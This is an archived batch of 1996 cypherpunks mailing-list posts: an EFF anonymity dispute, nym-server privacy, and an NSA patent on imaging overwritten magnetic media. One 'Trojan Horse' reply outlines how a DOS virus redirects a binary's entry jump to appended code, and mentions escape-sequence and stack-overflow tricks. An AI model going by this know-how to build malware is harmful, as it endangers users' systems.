> I would be most happy to be proven wrong and see EFF suddenly, in a burst of impressive moral fiber, speak out publically and take some political action to assure anonymous communication.

Don't be surprised if it happens. Also don't be surprised if it doesn't happen. In EFF's 6+ years, no clear consensus on anonymity has yet evolved within any version of EFF's board and staff. DO be surprised if you see EFF take an official position against anonymity. If that happens, I'll start looking for another job. I'm confident it won't happen, or I'd probably already be looking for another job.

> > Things simply are not as black and white as they might seem.
>
> Well, let's have a clear official position issued then to end all dispute.
>

I'd like to see that too, but it may be a while in coming.

> What is EFF doing if not supporting anonyminity?

That's a very good question. EFF has, the entire time I've been with it, and before that the entire time I was observing it (that is, ~1992 to present) been quite supportive of anonymity, in ways that range from relying on facets of the NAACP case in our own CDA challenge, to defending online anonymity when being interviewed by the press, to providing publicly available materials (e.g. at http://www.eff.org/pub/Privacy/Anonymity) on anonymity including remailer lists and FAQs, to having a link on our "other interesting sites" page to the WWW remailer gateway, to permitting anonymous posts to all of our public mailing lists. I can't think of any EFF statement against anonymity, and even Esther's personal statement is not against anonymity, just advising caution and noting that there are many unresolved concerns in this area.

> I'm hardly going to support an organization that proports to be pro-internet freedom and yet has no official position on anonyminity. Of

It's certainly your right to not support us. I'm sad that you won't, but it is beyond anything I can do anything about. Positions on issues take time to evolve.

> course you should expect people to wonder about EFF when you have no official position and yet some staff and board members seem to have a statist bent.

Again, I think you're making unfounded assumptions. The fact that Dyson has questions about the balance of the value and cost of online anonymity does not indicate a "statist bent". Hell, *I* have questions about that balance. For myself, I've found adequate answers, and have come to the conclusion that even if anonymity on the net were abused 1000x more than it is now, it would still be better to have anonymity than to not have it. But I have to let other people come to that conclusion themselves, with my help when appropriate.
I can't find any value in demonizing others who've not come to that conclusion, even if I do find value in severely criticizing people who have taken a completely anti-anonymity position, which Dyson has not. Dorothy Denning, different story. I will happily criticize her positions into the ground, because they are what they are. EFF's position does not exist yet, and the only not completely pro-anonymity individual opinions I've seen out of the board are not anti-anonymity, they're just full of questions. I can't slam people for having questions.

--
Stanton McCandlish
mech at eff.org
Electronic Frontier Foundation
Online Activist

From vznuri at netcom.com Tue Sep 3 03:45:43 1996
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Tue, 3 Sep 1996 18:45:43 +0800
Subject: What is the EFF doing exactly?
In-Reply-To:
Message-ID: <199609022254.PAA09742@netcom10.netcom.com>

ah, the quasi-yearly ranting on EFF has started up. what a great opportunity for drop-down-drag-dead flamewar.

Black Unicorn: I resent your holier-than-thou moral posturing over EFF, and am going to attack it as representative of other criticism I have seen of EFF.

EFF is an organization that is professional and has worked toward improving cyberspace. it is easy for someone such as yourself to criticize such an organization anonymously, but what is the justification of your criticism? to me someone who has tried and failed, yet is still trying, is better than someone who has never tried.

what *constructive* alternative to EFF do you propose? if you have none, please shut up. I am tired of people announcing loudly to the world, "well if EFF doesn't support [insert my personal jihad here], then they're a bunch of losers who don't deserve anyone's money".

>Why am I any more mistaken for pointing out that a single influential member of EFF's staff or board is anti-anonymity and yet remains with the organization than you are for pointing out that a single influential member who happened to be anti-anonymity has left?

get a clue. an organization does not have to officially espouse what its members espouse. what an organization espouses should be carefully crafted. if all members feel strongly about an issue, yet all also feel that it should not be part of the official plank, then that may be a wise decision to leave it out.

what an organization does *not* do is as important as what it does do. EFF is learning, by trial and error and the hard way, to "choose battles wisely". I would love to see more info about EFF's new direction. but one can ask for such clarification without a rabid style such as your own.
>In so far as an organization is much defined by those involved, I think it entirely right to wonder aloud about the personal motives of the staff and board. I think this PARTICULARLY prudent given EFF's reputation and prior conduct.

blah, blah, blah. why should EFF give the slightest damn what you think of them? if you were at the helm of a competing organization that was doing superior work, or a privacy lobbyist with a track record, maybe they should listen. as it stands I think they are giving you far more respect than you deserve by even responding to your various scurrilous insinuations.

why do I see so much of this in cyberspace and on the cpunks list: gripes, gripes, gripes by people who have no record themselves of doing anything constructive...? the difficulty of doing something constructive is proven by the failures, it is not necessarily evidence of incompetence or conspiracies. perhaps you, Unicorn, feel the cpunks have a greater track record than EFF?

>I would be most happy to be proven wrong and see EFF suddenly, in a burst of impressive moral fiber, speak out publically and take some political action to assure anonymous communication.

I would like you to explain why you feel the need to criticize EFF for not necessarily sharing your own agenda.

>Well, let's have a clear official position issued then to end all dispute.

again, you fail to grasp: EFF may justifiably not want to engage in that fight. it might be a wise decision. who are you to dictate EFF's agenda? why are you picking a fight with someone who might be the best ally?

>I'm hardly going to support an organization that proports to be pro-internet freedom and yet has no official position on anonyminity.

perhaps you would be more influential if you learned to spell what you are advocating. (hee, hee)

> Of course you should expect people to wonder about EFF when you have no official position and yet some staff and board members seem to have a statist bent.
and you, like many other cypherpunks and cyberspace weasels, have a whine-and-shriek-from-the-shadows bent.

BTW, I reject the claim by some here (e.g. TCM) that the supposed change in direction at EFF implies that such an organization is inherently top-heavy and will fail in comparison to cypherpunk guerilla-style "technology deployment." it seems to me both the cpunk philosophy and the EFF philosophy can coexist, and I really get tired of people who can't think past a "only one can exist" worldview.

I also don't understand the anonymity fight by cpunks. it's the wrong battle imho. ask any remailer operators how their services are panning out. they will complain of the incessant spam and increasing litigious pressure. I don't see any technological solutions to these problems. if there were, they'd have been invented now.

let's face it, anonymity is a pain in the ass to support. maybe there are other goals that are more crucial that lie at the heart of anonymity. what cpunks are really seeking is "assurance of freedom from retribution". when the problem is phrased more openly like that, other solutions become possible and worth consideration. anonymity is only one such way to achieve this goal. I for one would like to see more experimentation with reputation systems. "aw gee, nobody knows what one would look like". well, that's the point.

From jf_avon at citenet.net Tue Sep 3 03:55:53 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Tue, 3 Sep 1996 18:55:53 +0800
Subject: "Security risks" vs. "credit risks"
Message-ID: <9609030808.AB20606@cti02.citenet.net>

On 31 Aug 96 at 20:53, Igor Chudov @ home wrote:
> Airlines, for example, are under tight and rather arbitrary control of the FAA.

Most CPunks have no idea how true this is. Try reading about the Bob Hoover case if you want to learn about FAA's finest actions...

jfa

From furballs at netcom.com Tue Sep 3 03:59:29 1996
From: furballs at netcom.com (Paul S. Penrod)
Date: Tue, 3 Sep 1996 18:59:29 +0800
Subject: Still more mileage from the old grey mare... was: Trojan Horse
In-Reply-To: <199609030151.SAA07328@toad.com>
Message-ID:

On Mon, 2 Sep 1996, Bill Stewart wrote:
> >The key to the success is that the application in question has to be compromised to respond to these codes, either by design or by hacking. Either way the individual responsible must modify the execution mechanism, not just the data itself.
>
> A well-written program is hard to exploit, but badly written programs can often be exploited in ways that allow execution of untrusted code. For instance, the fingerd bug exploited so spectacularly by Robert Morris handed a program more input than it was ready to accept, and the program stupidly kept writing the input into the array, past the end, and out into the stack, where it could be later interpreted as executable code.

That is one instance where it was obscure and workable. I am not familiar with the UNIX binary map, but in the Intel DOS world (includes Windows to a large degree), the stack generally lies at the top of DSEG, not CSEG and flows down. Older incarnations of x86 allowed for such wonders as:

    push ds
    push cs
    pop ds
    [ series of writes ]
    pop ds

and voila, self modifying code by one method. Ugly, but it works. Variations on the same theme exist, now that Intel does not allow direct manipulation of the IP anymore.

It's not that difficult to do. Some of the digital audio work I was involved in several years ago required modifying code sequencing on the fly to accommodate time delays and different types of processor performance.

Intel binaries are not difficult to modify directly - especially when they are DOS binaries (note the plethora of viruses in the medium). Even good code can be reworked without having source. One of the tricks is to grab the initial JMP off the binary header and point it down past the bottom of the existing binary towards the code you have added.
This way on startup DOS does not truncate the new binary size via Function 31h. Now all you have to do is mudge the read section and look for your trigger before executing the additional code.

What I have just described is a very simplistic viral mechanism.

>
> If a popular GIF or JPEG interpreter was written that badly, you could possibly devise a GIF that lies about how big it is and encourages the program to scribble on its stack. Now, there probably aren't any like that, and it'd probably have to be Netscape or MSIE or Lview to be widespread enough to make an attack like that worthwhile. (I'd bet on MSIE, of the three of them :-) Does Microsoft have some sort of Really Cool Extension to JPEG, allowing Macros for Self-Modifying JPEGs, trying to out-do Netscape's animated GIFs?)
>

It wouldn't surprise me.

> >Let's see -current examples of computing items with this kind of a "feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the list keeps growing.
>
> Back when Good Times came out, everyone denied that it was possible for there to be any risk from a text file (though, as I pointed out, escape-sequence hacks have been used occasionally for over 15 years), and not long after that, the MSWord Macro Viruses started appearing. Bad Code can't always be hacked usefully, but it can always be hacked...
>
> # Thanks; Bill
> # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
> #
> # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto
>

Escape sequence hacking in DOS has been done since the day ANSI.SYS came out to play. It was a quick and dirty trick to send escape sequence laden files to the unsuspecting and ask them to type them to the screen. Then the fun began.

When you stop and think about it though, any application that functions as a data engine of some type is susceptible at some level to this form of attack. The issue is really which method to employ that will give you ROI.
...Paul

From tcmay at got.net Tue Sep 3 04:09:31 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 3 Sep 1996 19:09:31 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID:

At 10:09 PM 9/2/96, Stanton McCandlish wrote:
>Also questionably relevant for an issue like this (more relevant perhaps to intellectual property issues, etc.) The political axis most relevant here is civil libertarian v. authoritarian. I don't think you'll find any authoritarians on the EFF board or staff.

A civil libertarian would not be speaking about limiting forms of speech to those that are traceable. Anonymous messages are consistent with the First Amendment. Calls for restrictions on anonymity are not consistent with a civil liberties orientation.

(As I described in a much longer message earlier today, I can only hope Esther Dyson simply hasn't thought enough about this issue, and about the implications of her calls for "responsible freedom.")

--Tim May

--
[This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why don't you boys just come on in and fuck them right here in my house - I'll just watch!"....Later, up in the mountains, the younger daughter said: "Dad's getting old. I say we should fuck him before he's too old to fuck." So the two daughters got him drunk and screwed him all that night. Sure enough, Dad got them pregnant, and had an incestuous bastard son....Onan really hated the idea of doing his brother's wife and getting her pregnant while his brother got all the credit, so he pulled out before he came....Remember, it's not a good idea to have sex with your sister, your brother, your parents, your pet dog, or the farm animals, unless of course God tells you to.
[excerpts from the Old Testament, Modern Vernacular Translation, TCM, 1996]

From MAILER-DAEMON at mqg-smtp3.usmc.mil Tue Sep 3 04:10:19 1996
From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil)
Date: Tue, 3 Sep 1996 19:10:19 +0800
Subject: Undeliverable Message
Message-ID:

To:
Cc:
Subject: Re: Cypherpunk Mailboxes?

Message not delivered to recipients below. Press F1 for help with VNM error codes.

VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER

VNM3043 -- MAILBOX IS FULL

The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered.

The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER).

When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages.

On Mon, 2 Sep 1996, The Deviant wrote:

> Hrmm.. perhaps there's a better way...
> such as having the user and the mail server negotiate a key (i don't really know the details of diffie-hellman or the like, so tell me if this isn't feasible), and have the encryption/decryption routines strip addresses, so that the person is only identifiable by their key...

The mail server still has to send packets to the user. A packet sniffer might not be able to find out the actual contents of the transmission, but it would be able to find out the host that has made the connection. If this is combined with the knowledge of the times that certain user's mailboxes get cleared out, it would be possible to find out which nyms belong to which people. The current nym servers that automatically forward mail do not have this problem.

-- Mark

PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From schneier at counterpane.com Tue Sep 3 04:17:31 1996
From: schneier at counterpane.com (Bruce Schneier)
Date: Tue, 3 Sep 1996 19:17:31 +0800
Subject: What the NSA is patenting
Message-ID:

I just spent a pleasant hour or so searching a patent database for all patents assigned to the NSA. There's some interesting stuff:

    "Self-locking, tamper-evident package"
    "Method of retrieving documents that concern the same topic"

Fifty-Four patents total. (Used to be they just kept stuff secret; now they patent some of it.)

Attached is the most interesting thing I found: a patent on techniques for reading data off overwritten magnetic media.

Bruce

********************************************************************************

United States Patent
Patent Number: 5264794
Date of Patent: 23 Nov 1993

Method of measuring magnetic fields on magnetically recorded media using a scanning tunneling microscope and magnetic probe

Inventor(s): Burke, Edward R., Silver Spring, MD, United States
             Mayergoyz, Isaak D., Rockville, MD, United States
             Adly, Amr A., Hyattsville, MD, United States
             Gomez, Romel D., Beltsville, MD, United States
Assignee: The United States of America as represented by the Director, National Security Agency, Washington, DC, United States (U.S. government)
Appl. No.: 92-947693
Filed: 21 Sep 1992

Int. Cl. ............. G01R033-00; G01R033-12
Issue U.S. Cl. ....... 324/260.000; 324/212.000
Current U.S. Cl. ..... 324/260.000; 324/212.000
Field of Search ...... 324/212; 324/244; 324/260; 324/262

Reference Cited

PATENT DOCUMENTS

Patent Number   Date       Class         Inventor
-------------   --------   -----------   -------------------
US 4232265      Apr 1980   324/260.000   Smirnov
US 4567439      Jan 1986   324/304.000   McGregor
US 4625166      Nov 1986   324/223.000   Steingroever et al.
US 4710715      Dec 1987   324/307.000   Mee et al.
US 4791368      Dec 1988   324/301.000   Tsuzuki

OTHER PUBLICATIONS

Magnetic Tip Sees Fine Detail, Lost Data, E. Pennisi, Feb. 29, 1992, Science News, p. 135.
Magnetic Field Imaging by Using Magnetic Force Scanning Tunneling Microscopy, Gomez, Burke, Adly, Mayergoyz, Feb. 17, 1992 pp. 906-908 Appl. Phy. Lett.
Tunneling-Stabilized Magnetic Force Microscopy of Bit Tracks . . . , Rice, Moreland, IEEE Trans. on Magnetics vol. 27 No. 3 May 1998, pp. 3452-3454.
Magnetic Force Scanning Tunneling Microscope Imaging of Overwritten Data, Gomez, Adly, Mayergoyz, Burke, IEEE Journal of Magnetics, Sep. 1992.
Analysis of Tunneling Magnetic Force Microscopy Using a Flexible Triangular Probe, Burke, Gomez, Adly, Mayergoyz, IEEE Journal of Magnetics, Sep. 1992.
Magnetic Force Microscopy: General Principles and Application to . . . , Rugar, Mamin, et al. Journal of Appl. Phys., Aug. 1, 1990 pp. 1169-1183.
Analysis of In-Plane Bit Structure by Magnetic Force Microscopy, Wadas, Grutter, Guntherodt, J. Appl Phys. Apr. 1, 1990 pp. 3462-3467.
Theoretical Approach to Magnetic Force Microscopy, Wadas, Grutter, American Physical Society, Jun. 1, 1989, 12,013-17.
Theory of Magnetic Imaging by Force Microscopy, Saenz, Garcia, Slonczewski, Appl. Phys. Letters, Oct. 10, 1988 pp. 1449-1451.
Description of Magnetic Imaging in Atomic Force Microscopy, Wadas, Journal of Magnetism and Magnetic Materials, Aug. 1989 pp. 263-268.

Art Unit - 267
Primary Examiner - Snow, Walter E.
Attorney, Agent or Firm - Morelli, Robert D.; Maser, Thomas O.
---------------------
8 Claim(s), 4 Drawing Figure(s), 4 Drawing Page(s)

ABSTRACT

The present invention discloses a method of measuring magnetic fields on magnetically recorded media. The method entails replacing the metal tip typically used with a scanning tunneling microscope with a flexible thin-film nickel or iron magnetic probe. The present invention describes a mathematical equation that relates probe position to magnetic field strength. In order to establish a tunneling current between the magnetic probe and the magnetically recorded media, any protective layer on the magnetically recorded media is removed. The magnetic probe and the magnetically recorded media may be coated with at least three-hundred angstroms of gold in order to reduce spurious probe deflections due to oxide growths on either the magnetic probe or the magnetically recorded media. The scanning tunneling microscope is designed to maintain a constant tunneling current between the probe and the item being scanned. The present invention uses the scanning tunneling microscope to scan the recording tracks of magnetically recorded media. Any change in the magnetic field of the magnetically recorded media will cause a change in the tunneling current. The microscope will change the position of the probe in order to maintain a constant tunneling current. These changes in position are recorded as an image. A mathematical equation that relates probe position to magnetic field strength is then used to extract the magnetic fields of the magnetically recorded media from the recorded image of probe positions.

BACKGROUND OF THE INVENTION

1. Field of Invention

This invention relates to a method of measuring the magnetic fields of a recorded surface and more particularly to a method of measuring the magnetic fields of magnetically recorded information using a scanning tunneling microscope.

2. Description of Related Art

One of the most active areas in magnetic recording technology is the study of processes occurring at the microscopic level. In recent years, several techniques based on scanning tunneling microscopy have been developed to study magnetization patterns in recording media with sub-micron resolution. These include magnetic force microscopy (MFM), and tunneling stabilized (TS) or magnetic force scanning tunneling microscopy (MFSTM).

In "Tunneling-stabilized Magnetic Force Microscopy of Bit Tracks on a Hard Disk," a published article by P. Rice and J. Moreland in IEEE Trans. Magn., vol. Mag-27, 1991, pp. 3452-3454 it was shown that magnetic data on a hard disk can be imaged with a tunneling microscope by using a flexible triangular probe cut from a thin film of magnetic material.

In U.S. Pat. No. 4,791,368, entitled "Automatic Magnetic Field Measuring Apparatus Using NMR Principles," a method of more accurately measuring magnetic fields is described which entails surrounding the item being measured with a coil, initially measuring the magnetic field, estimating the magnetic resonance frequency of the item being measured, applying a high-frequency voltage of the estimated magnetic resonance frequency, iteratively refining the estimate of the magnetic resonance frequency until the variation in coil inductance is a maximum, and finally, from the resulting magnetic resonance frequency, calculating the magnetic field of the item being measured.

In U.S. Pat. No. 4,710,715, entitled "Method Of Mapping Magnetic Field Strength And Tipping Pulse Accuracy Of An NMR Imager," a method of checking the homogeneity of a magnetic field by producing contour lines of equal field strength is disclosed that utilizes a different preparation phase for NMR imaging. The new preparation phase consists of tipping the spins of the volume elements with a 90 degree wait 90 degree RF pulse sequence.

In U.S. Pat. No. 4,625,166, entitled "Method For Measuring Magnetic Potentials Using Hall Probes," a method of measuring the hysteresis curve of a magnetic material is disclosed. The steps of the method include subjecting the material to a magnetic field, summing the voltages from a plurality of Hall probes that are spaced in an arc, obtaining the magnetic flux density in the material, and deriving a hysteresis curve of the material from the magnetic flux density and the magnetic field intensity.

In U.S. Pat. No. 4,567,439, entitled "Apparatus For Measuring The Magnitude Of A Magnetic Field," a method of measuring the magnitude of a magnetic field is disclosed. The steps of the method include magnetizing the item, inducing an oscillating magnetic field, permitting free precession, inducing signals during free precession, and producing an output that is proportional to the frequency deviation of the induced signals.

In U.S. Pat. No. 4,232,265, entitled "Device For Measuring Intensity Of Magnetic Or Electromagnetic Fields Using Strain Gauges Mounted On Ferromagnetic Plates," a device is disclosed that measures magnetic fields by monitoring the electrical signal produced by strain gauges which are connected to overlapping ferromagnetic plates. The magnetic field to be measured causes the gap between the plates to change which in turn causes the electrical output signal from the strain gauges to change. The magnitude of the electrical signal indicates the magnitude of the magnetic field.

SUMMARY OF THE INVENTION

It is an object of this invention to provide a method of measuring magnetic fields.

It is another object of this invention to provide a method of measuring magnetic fields of magnetically recorded information.

It is another object of this invention to provide a method of measuring magnetic fields of magnetically recorded information using a scanning tunneling microscope.

It is another object of this invention to provide a method of measuring magnetic fields of magnetically recorded information using a scanning tunneling microscope that incorporates a thin-film magnetic probe that is used to relate probe position to magnetic field strength.

These objects are achieved by using a magnetic force scanning tunneling microscope to measure magnetic fields. This microscope, which is typically used for recording surface topology of an item, is modified by replacing the fine metallic tip with a flexible magnetic probe.

In the typical operation of a scanning tunneling microscope, the fine metallic tip, which is held at a bias potential, is placed in close proximity to the sample surface so that a tunneling current is established between the tip and the sample surface. As the tip scans across the surface, changes in surface topology cause the tunneling current to change. In order to maintain a constant tunneling current, the microscope changes the position of the tip. These changes in tip position are recorded in a two dimensional image that reflects the surface topology of the item scanned.

The present invention shows that by replacing the tip with a magnetic probe and by scanning recorded media along the recording tracks, which have no significant topological variations, the scanning tunneling microscope can be used to record the magnetic fields of the recorded media. Just as surface variations caused changes in the tunneling current, changes in magnetic field cause changes in the tunneling current. The microscope will change the position of the probe, as it did with the metallic tip, in order to maintain a constant tunneling current. These position changes are recorded and, with the use of a mathematical equation that relates probe position to magnetic field strength, are used to measure the magnetic fields of the recorded media.

BRIEF DESCRIPTION OF THE DRAWINGS

FIG. 1 is a perspective view of a typical image created by a scanning tunneling microscope;
FIG. 2 is a perspective view of the magnetic probe superimposed upon a graph that indicates the critical dimensions, coordinates, and angles;
FIG. 3 is a chart showing the relationship between magnetic probe amplitude and the angle theta; and
FIG. 4 is a chart that compares theoretically expected results of probe amplitude versus the angle phi against experimentally obtained data of probe amplitude versus the angle phi.

DESCRIPTION OF PREFERRED EMBODIMENTS

There is a growing interest in measuring magnetic fields created by magnetization patterns recorded on magnetic media. Since these fields vary over microscopic distances, various microscopic techniques have been developed. The present invention describes a method for measuring magnetic fields on magnetically recorded media by using a modified scanning tunneling microscope. These magnetic fields are measured by determining the relationship between the microscope probe movement and magnetic field strength.

The scanning tunneling microscope operates by scanning the surface of an object with a metal tip. The tip is biased with a dc voltage and placed close enough to the surface of the object to establish a tunneling current. Changes in the surface topology of the object cause a change in the tunneling current. A feedback system in the microscope adjusts the vertical position of the tip in order to maintain a constant tunneling current. As the tip is scanned across the object, the changes in tip position are recorded. These recordings reflect the surface topology of the item scanned. An example of such an image is indicated in FIG. 1.

The present invention discloses a method for using a modified magnetic force scanning tunneling microscope to measure magnetic fields. The metal tip of the microscope is replaced with a thin-film magnetic probe 20 of FIG. 2. Instead of scanning the surface topology of an item, the modified microscope is used to scan individual recording tracks of a magnetically recorded media which do not have any significant topological variations. Just as was done with the metal tip, the probe 20 is placed in close proximity with the recorded media in order to establish a tunneling current. The probe 20 is then scanned along the recording tracks of the magnetically recorded media. Changes in magnetic field cause a change in the tunneling current. The microscope then changes the position of the probe 20 in order to maintain a constant tunneling current. These position changes are recorded and, with the use of a mathematical equation that relates probe position to magnetic field strength, used to measure the magnetic fields of the recorded media.

The energy of interaction between the probe 20 and the magnetic field emanating from the sample surface was evaluated using the geometry as shown in FIG. 2. It was assumed that the field interacts only with the last magnetic domain (i.e., a region that is magnetized in one direction only) at the tip of the probe 20 and that this domain is magnetized uniformly along its length. The magnetization pattern is typically a recorded signal with repetition in the x-direction and infinite extent in the y-direction.

Measurements were taken with a scanning tunneling microscope operating in a constant current mode with a maximum scan range in excess of 100 micrometers in each lateral dimension. The tunneling current is typically 0.11 nanoamperes, at a dc bias of 2.7 volts. The scan rate is about 1.5 lines per second. Any protective coatings on the recorded media must be removed. Adverse effects due to surface oxides on the probe 20 or recorded media are reduced by coating the recorded media and the tip of the probe 20 with approximately 300 angstroms of gold. Such a coating is typically deposited by conventional sputtering techniques.
The tunneling current changes as the probe 20 interacts with the surface and its magnetic fields. Feedback compensates for this change and the vertical displacement of the probe 20, $\Delta z$, is recorded as a function of its horizontal position. Therefore, a two dimensional image, similar to the image shown in FIG. 1, is formed that maps variations in z as a function of lateral position, i.e., $\Delta z(x,y)$. Such an image reflects both the topological and magnetic features of the magnetically recorded media. With the appropriate choice of probe 20 properties, it is possible to extract the magnetic fields from this image.

The magnetic contribution to the displacement, $\Delta z$, is determined by the forces acting on the probe 20. Several theoretical calculations that relate recorded images using such a probe 20 with the forces on the probe 20 have appeared in "Analysis of in-plane bit structure by magnetic force microscopy", a published article by A. Wadas, P. Grutter, and H. Guntherodt in J. Appl. Phys., vol. 67, 1990, p. 3462 and "Theory of magnetic imaging by force microscopy," a published article by J. Saenz, N. Garcia, and J. Slonczewski in Appl. Phys. Lett. 53, 1988, p. 1449. However, these calculations have not directly addressed the issue of the dependence of image contrast and resolution on the orientation of the probe 20 as the present invention does. By assuming that the probe 20 is uniformly magnetized along the direction of its length, the vertical displacement can be modeled by considering the interaction of the surface magnetic fields with a magnetic charge distribution at the tip of the probe 20.

Flexible magnetic probes 20 made of nickel (Ni) can be used. The probes 20 used in the present invention were fabricated by evaporating approximately 500 nanometers of Ni onto pre-patterned substrates. These films retain the shape of the substrate pattern when peeled away from the pattern. A typical probe would have a thickness (t) of less than or equal to one micrometer, a length (l) of two millimeters, and a width (w) of one micrometer. The angle delta is typically 15 degrees. The angle theta can vary over a range of zero degrees to pi/2 degrees. The angle phi can vary over a range of -pi/2 to pi/2. It has been observed that these probes 20 produce consistent images of magnetization patterns.

FIG. 1 also shows the parameters for the equations used in the present invention. It was assumed that the recorded signal is a repetitive pattern of wavelength lambda ($\lambda$) in the x direction, with infinite extent in the y direction. In "Theoretical approach to magnetic force microscopy," a published article by A. Wadas and P. Grutter in Phys. Rev. B, vol. 39, no. 16, June 1989, pp. 12013-12017 it was shown that the energy (E) of interaction between the field from the pattern and the last domain on the probe tip can be expressed as $E = -\int H \cdot M \, dV$, where H is the magnetic field from the pattern, M is the magnetization of the domain, and V is the volume of the domain. The magnetic field can be expressed as the gradient of a scalar potential capital phi ($\Phi$), and, if the magnetization is uniform ($\nabla \cdot M = 0$ is sufficient), then the above equation for E can be rewritten as $E = \int \nabla \cdot (\Phi M) \, dV$. This new equation for E can then be converted to a surface integral using Gauss's theorem to obtain $E = \int \Phi \, M \cdot dA$. This latest equation simplifies the calculation of E and the identification of the source of the different terms.

The scalar potential will then be of the form ##EQU1## where $k = 2\pi n/\lambda$ and the coefficients $\Phi_n$ match the series solution to the particular field pattern. Specific values of $\Phi_n$ for various field patterns can be found in "Theoretical approach to magnetic force microscopy," a published article by A. Wadas and P. Grutter in Phys. Rev. B, vol. 39, no. 16, pp 12013-12017, June 1989 and in "Analysis of in-plane bit structure by magnetic force microscopy," a published article by A. Wadas, P. Grutter, and H. Guntherodt in J. Appl. Phys. 67 (7), pp. 3462-3467, 1990.

In the present invention, it was assumed that 1) the domain is magnetized along the probe axis by shape anisotropy, 2) the domain is much longer than $\lambda$ so that the limit of integration in the z direction can be extended to infinity, and 3) the thickness of the probe, t, is much less than the wavelength $\lambda$. In "Magnetic force microscopy: General principles and application to longitudinal recording media," a published article by D. Rugar, H. Mamin, P. Guethner, S. Lambert, J. Stern, I. McFadyen, and T. Yogi in J. Appl. Phys. 68 (3), 1990, pp. 1169-1183, it was shown that the last domain on the probe was 20 micrometers in length. A domain length of this size is typically much longer than the wavelength of patterns on modern recording surfaces.

In calculating the energy of interaction (E), the last two equations are used to obtain ##EQU2## The integrals were performed so that the point (x,z) is the coordinate of the probe tip. The first term in the calculation of the energy of interaction is due to a magnetic charge, Mtw, at the tip of the probe. The magnetic potential is weighted by a sampling factor caused by the variation in the field across the width, w, of the probe tip. The next two terms can be thought of as the contributions from the magnetic charges on the sides of the probe, separated from the tip by the distances $x_\pm$.

The quantity that is measured by the tunneling microscope is the displacement, $\Delta z$, of the probe tip. The displacement is caused by both the surface topology and magnetic field of the recorded media. If the probe tip is properly designed, the magnetic interaction will predominate and the effects due to surface topology will be minimized. If the probe is constrained to rotate in the theta ($\theta$) direction, the displacement will be given by $l \sin\theta \, \Delta\theta$, where l is the length of the probe's 20 moment-arm. A force, $F_N$, normal to the probe 20 will cause a rotation in the theta ($\theta$) direction such that $l F_N = -K \Delta\theta$ where K is the tip torque constant. The displacement $\Delta z$ is then given by ##EQU3## The force acting on the tip is the gradient of the energy, $F = -\nabla E$, so that $\Delta z$ further becomes ##EQU4## Using the last equation and the equation for the energy (E) of interaction, $\Delta z$ becomes ##EQU5##

These last three equations give a complete description of the interaction between the probe and the recorded pattern. In general, the equations are quite complicated and their usefulness is not readily apparent. In the case where the probe lines up with the pattern (i.e., phi=0), so that the probe scans along the recorded information, the equation for $\Delta z$ reduces to a simple form, ##EQU6## The first two terms give the interaction between the magnetic field and the magnetic charge at the tip. The third term gives the effect of the charges on the sides of the probe. The third term was written in the integral form so that it could be expressed in terms of the magnetic field Hz. This last equation can be used to obtain relative values of the magnetic field components Hx and Hz. To obtain absolute values, the probe would have to be calibrated in a known field to obtain the factor $l^2 Mtw/K$.

An alternative way to obtain the fields from the last equation is by obtaining three images at three different values of the angle theta ($\theta$). The fields Hx and Hz can then be obtained at every point from a linear combination of the three images. As an example, if the images were taken at theta equal to 30, 45, and 60 degrees then Hx and Hz would be given by the following two equations:

$H_x = -18.01\,z(30^\circ) - 13.55\,z(60^\circ) + 29.35\,z(45^\circ)$,
$H_z = -23.48\,z(30^\circ) - 10.40\,z(60^\circ) + 29.35\,z(45^\circ)$

where ##EQU7##

If phi=0 is chosen as the angle of rotation of the probe, the angle theta must be determined to give the best image sensitivity. For ##EQU8## the relative amplitude of the harmonics, for phi=0, will vary with theta as ##EQU9## The amplitude will have a maximum near theta=pi/2 for both large and small values of a. Raising the elevation of the probe to this value would cause interactions with all the domains in the probe so a smaller value would have to be chosen. The smallest value of theta for which the amplitude is a maximum occurs when a=1, cos(theta)=1/3, and theta=70.5 degrees. This is still a relatively large elevation, but as can be seen from FIG. 3, the maximum occurs over a broad range. Adequate sensitivity can be achieved when theta is as small as 45 degrees.

Numerous experiments were performed to verify the equations given above for $\Delta z$, $C^2$, and beta. Agreement between experimental data and theory, as shown in FIG. 4, is quite good. The theoretical curve was obtained using delta ($\delta$) = 15 degrees, theta=12 degrees and w=1 micrometer. Error is introduced into the experimental data if, during rotation of the sample, a different recorded track is followed.

The method of the present invention shows how the constituent magnetic fields from recorded magnetic patterns can be obtained using a magnetic force scanning tunneling microscope. The sensitivity of the microscope will vary with the orientation of the probe.

Changes and modifications in the specifically described embodiments can be carried out without departing from the scope of the invention which is intended to be limited only by the scope of the appended claims.

1. A method of measuring magnetic fields on magnetically recorded media comprising the steps of:
   (a) replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe in order to relate probe position to magnetic field strength;
   (b) removing any protective layer from said magnetically recorded media so that said protective layer does not impede the establishment of a tunneling current between said magnetic probe and said magnetically recorded media;
   (c) aligning said magnetic probe with a recorded track of said magnetically recorded media at an angle of zero degrees;
   (d) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees in order to establish said tunneling current;
   (e) scanning said recorded track of said magnetically recorded media with said magnetic probe;
   (f) recording changes in position of said magnetic probe during said scanning of step (e) due to changes in the magnetic field of said magnetically recorded media; and
   (g) computing the magnetic fields associated with said recordings of step (f) by using a mathematical equation that relates the position of said magnetic probe to the strength of the magnetic field.

